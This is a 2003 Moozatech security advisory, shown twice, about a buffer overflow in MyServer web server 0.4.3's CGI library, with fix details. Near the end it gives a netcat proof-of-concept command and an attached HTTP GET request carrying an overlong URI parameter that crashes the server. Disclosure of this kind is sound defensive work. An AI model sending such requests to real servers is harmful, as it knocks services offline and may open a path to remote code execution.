Moozatech: MyServer Buffer Overflow vulnerability
12/09/03
Moozatech Advisory http://www.moozatech.com/mt-12-09-2003.txt
-------------------------------------------------------
Application: MyServer Web Server
Web Site: http://myserverweb.sf.net
Versions: 0.4.3 and below
Platform: Windows98,Windows2000,Linux
Bug: Buffer Overflow.
Risk: Remote DOS and unauthorized remote access.
Severity: High
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
===============
1) Introduction
===============
MyServer is a free, powerful web server program designed to be easily run on
a personal
Computer by the average computer user.
It is a multithread application and supports HTTP, CGI, ISAPI, WinCGI and
FastCGI protocols.
======
2) Bug
======
a buffer overflow might allow Remote attacker to invoke malicious code by
submitting a request containing excessive data.
That will cause a buffer overflow and might allow to run code of choice
Under the web server privileges.
The problem is in the MSCGI library (cgi-lib.dll) that doesn’t handle
correctly long
String values for the URI variables.
====================
3) Proof of concept.
====================
nc.exe -v www.victim.com < request.txt
--
The script is attached.
This will crash the program with a memory overflow.
======
4) Fix
======
The author has confirmed this bug and temporary fix is available through
MyServer cvs repository at:
http://myserverweb.sourceforge.net/cvs.php
Complete patch will be available in the next upcoming release of myserver.
==================
5) About Moozatech
==================
Moozatech IT Systems Ltd. (“Moozatech”) is a leading information security
consulting
and project management firm focused on developing
"Secure IT Solutions" which best suit the client's operational needs.
Moozatech devotes time to make a secure computing environment for customers.
-----
Moran Zavdi
Moozatech IT Systems
www.moozatech.com
12/09/03
Moozatech Advisory http://www.moozatech.com/mt-12-09-2003.txt
-------------------------------------------------------
Application: MyServer Web Server
Web Site: http://myserverweb.sf.net
Versions: 0.4.3
Platform: Windows98,Windows2000,Linux
Bug: Buffer Overflow.
Risk: Remote DOS and unauthorized remote access.
Severity: High
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
===============
1) Introduction
===============
MyServer is a free, powerful web server program designed to be easily run on a
personal
Computer by the average computer user.
It is a multithread application and supports HTTP, CGI, ISAPI, WinCGI and
FastCGI protocols.
======
2) Bug
======
a buffer overflow might allow Remote attacker to invoke malicious code by
submitting a request containing excessive data.
That will cause a buffer overflow and might allow to run code of choice Under
the web server privileges.
The problem is in the MSCGI library (cgi-lib.dll) that doesn?t handle correctly
long
String values for the URI variables.
====================
3) Proof of concept.
====================
nc.exe -v www.victim.com < request.txt
--
The script is attached.
This will crash the program with a memory overflow.
======
4) Fix
======
The author has confirmed this bug and temporary fix is available through
MyServer cvs repository at:
http://myserverweb.sourceforge.net/cvs.php
Complete patch will be available in the next upcoming release of myserver.
==================
5) About Moozatech
==================
Moozatech IT Systems Ltd. (?Moozatech?) is a leading information security
consulting
and project management firm focused on developing
"Secure IT Solutions" which best suit the client's operational needs.
Moozatech devotes time to make a secure computing environment for customers.
GET
/cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Moozatech (compatible; Moozatech Scanner)
Host: 12.12.12.12
Connection: Keep-Alive